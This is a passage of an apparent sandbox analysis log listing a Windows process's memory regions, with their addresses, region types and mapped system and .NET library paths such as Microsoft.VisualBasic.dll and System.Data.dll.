region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 370
start_va = 0x4dc0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dc0000"
filename = ""
Region:
id = 371
start_va = 0x4dd0000
end_va = 0x4ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 372
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 373
start_va = 0x4de0000
end_va = 0x4deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004de0000"
filename = ""
Region:
id = 374
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 375
start_va = 0x4df0000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 376
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 377
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 378
start_va = 0x7fe60000
end_va = 0x7feaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe60000"
filename = ""
Region:
id = 379
start_va = 0x7fe50000
end_va = 0x7fe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe50000"
filename = ""
Region:
id = 380
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 381
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 382
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 383
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 384
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 385
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 386
start_va = 0x4df0000
end_va = 0x4dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004df0000"
filename = ""
Region:
id = 387
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 388
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 389
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 390
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 391
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 392
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 393
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 394
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 395
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 396
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 397
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 398
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 399
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 400
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 401
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 402
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 403
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 404
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 405
start_va = 0x4d00000
end_va = 0x4d0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d00000"
filename = ""
Region:
id = 406
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 407
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 408
start_va = 0x4e20000
end_va = 0x4e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 409
start_va = 0x6f880000
end_va = 0x6f89cfff
monitored = 0
entry_point = 0x6f883b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 410
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 411
start_va = 0x4d00000
end_va = 0x4d07fff
monitored = 0
entry_point = 0x4d03fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 412
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 413
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 414
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 415
start_va = 0x4e00000
end_va = 0x4e0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 416
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 417
start_va = 0x4e30000
end_va = 0x4e3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 418
start_va = 0x4e40000
end_va = 0x4e4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e40000"
filename = ""
Region:
id = 419
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 420
start_va = 0x743f0000
end_va = 0x74481fff
monitored = 0
entry_point = 0x74428cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 421
start_va = 0x4e30000
end_va = 0x4e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 422
start_va = 0x4e70000
end_va = 0x4f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e70000"
filename = ""
Region:
id = 423
start_va = 0x4f70000
end_va = 0x4faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f70000"
filename = ""
Region:
id = 424
start_va = 0x4fb0000
end_va = 0x50affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fb0000"
filename = ""
Region:
id = 425
start_va = 0x50b0000
end_va = 0x50effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050b0000"
filename = ""
Region:
id = 426
start_va = 0x50f0000
end_va = 0x51effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000050f0000"
filename = ""
Region:
id = 427
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 428
start_va = 0x51f0000
end_va = 0x526ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051f0000"
filename = ""
Region:
id = 429
start_va = 0x6aa20000
end_va = 0x6ab8afff
monitored = 0
entry_point = 0x6aa8e360
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_538a540779726150\\gdiplus.dll")
Region:
id = 430
start_va = 0x5270000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005270000"
filename = ""
Region:
id = 431
start_va = 0x5270000
end_va = 0x52affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005270000"
filename = ""
Region:
id = 432
start_va = 0x52b0000
end_va = 0x53affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000052b0000"
filename = ""
Region:
id = 433
start_va = 0x5460000
end_va = 0x546ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 434
start_va = 0x74120000
end_va = 0x7423efff
monitored = 0
entry_point = 0x74165980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 435
start_va = 0x6cec0000
end_va = 0x6d0b0fff
monitored = 0
entry_point = 0x6cfa3cd0
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll")
Region:
id = 436
start_va = 0x53b0000
end_va = 0x53f8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-system.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat")
Region:
id = 437
start_va = 0x5400000
end_va = 0x5403fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005400000"
filename = ""
Region:
id = 438
start_va = 0x5470000
end_va = 0x646ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 439
start_va = 0x5410000
end_va = 0x5413fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005410000"
filename = ""
Region:
id = 440
start_va = 0x6470000
end_va = 0x656ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006470000"
filename = ""
Region:
id = 441
start_va = 0x6570000
end_va = 0x666ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006570000"
filename = ""
Region:
id = 442
start_va = 0x6670000
end_va = 0x672cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 443
start_va = 0x6730000
end_va = 0x6b2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006730000"
filename = ""
Region:
id = 444
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 445
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 446
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 447
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 448
start_va = 0x5420000
end_va = 0x542ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005420000"
filename = ""
Region:
id = 449
start_va = 0x5430000
end_va = 0x543ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005430000"
filename = ""
Region:
id = 450
start_va = 0x6b30000
end_va = 0x7021fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006b30000"
filename = ""
Region:
id = 451
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 452
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 453
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 454
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 455
start_va = 0x5440000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 456
start_va = 0x6a740000
end_va = 0x6aa1cfff
monitored = 0
entry_point = 0x6a9f5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 457
start_va = 0x5440000
end_va = 0x545ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 458
start_va = 0x7030000
end_va = 0x730cfff
monitored = 0
entry_point = 0x72e5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 459
start_va = 0x6a740000
end_va = 0x6aa1cfff
monitored = 0
entry_point = 0x6a9f5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 460
start_va = 0x7310000
end_va = 0x7310fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007310000"
filename = ""
Region:
id = 461
start_va = 0x75e90000
end_va = 0x75eeefff
monitored = 0
entry_point = 0x75e94af0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 462
start_va = 0x76160000
end_va = 0x762d7fff
monitored = 0
entry_point = 0x761b8a90
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 463
start_va = 0x76c10000
end_va = 0x76c1dfff
monitored = 0
entry_point = 0x76c15410
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 464
start_va = 0x7320000
end_va = 0x75f5fff
monitored = 0
entry_point = 0x75d5c24
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 465
start_va = 0x7320000
end_va = 0x732ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007320000"
filename = ""
Region:
id = 466
start_va = 0x7330000
end_va = 0x733ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007330000"
filename = ""
Region:
id = 467
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 468
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 469
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 470
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 471
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 472
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 473
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 474
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 475
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 476
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 477
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 478
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 479
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 480
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 481
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 482
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 483
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 484
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 485
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 486
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 487
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 488
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 489
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 490
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 491
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 492
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 493
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 494
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 495
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 496
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 497
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 498
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 499
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 500
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 501
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 502
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 503
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 504
start_va = 0x7340000
end_va = 0x734ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007340000"
filename = ""
Region:
id = 505
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 506
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 507
start_va = 0x7350000
end_va = 0x735ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007350000"
filename = ""
Region:
id = 508
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 509
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 510
start_va = 0x7360000
end_va = 0x736ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007360000"
filename = ""
Region:
id = 511
start_va = 0x7350000
end_va = 0x7354fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sorttbls.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp")
Region:
id = 512
start_va = 0x7360000
end_va = 0x73a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortkey.nlp"
filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp")
Region:
id = 513
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 514
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 515
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 516
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 517
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 518
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 519
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 520
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 521
start_va = 0x73b0000
end_va = 0x73bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000073b0000"
filename = ""
Region:
id = 522
start_va = 0x73b0000
end_va = 0x73cffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000073b0000"
filename = ""
Region:
id = 523
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 524
start_va = 0x73d0000
end_va = 0x743bfff
monitored = 0
entry_point = 0x742cd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 525
start_va = 0x7440000
end_va = 0x744ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007440000"
filename = ""
Region:
id = 526
start_va = 0x64890000
end_va = 0x648fbfff
monitored = 0
entry_point = 0x648ecd0e
region_type = mapped_file
name = "system.configuration.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Configuration\\2.0.0.0__b03f5f7f11d50a3a\\System.configuration.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.configuration\\2.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll")
Region:
id = 527
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 528
start_va = 0x7450000
end_va = 0x745ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007450000"
filename = ""
Region:
id = 529
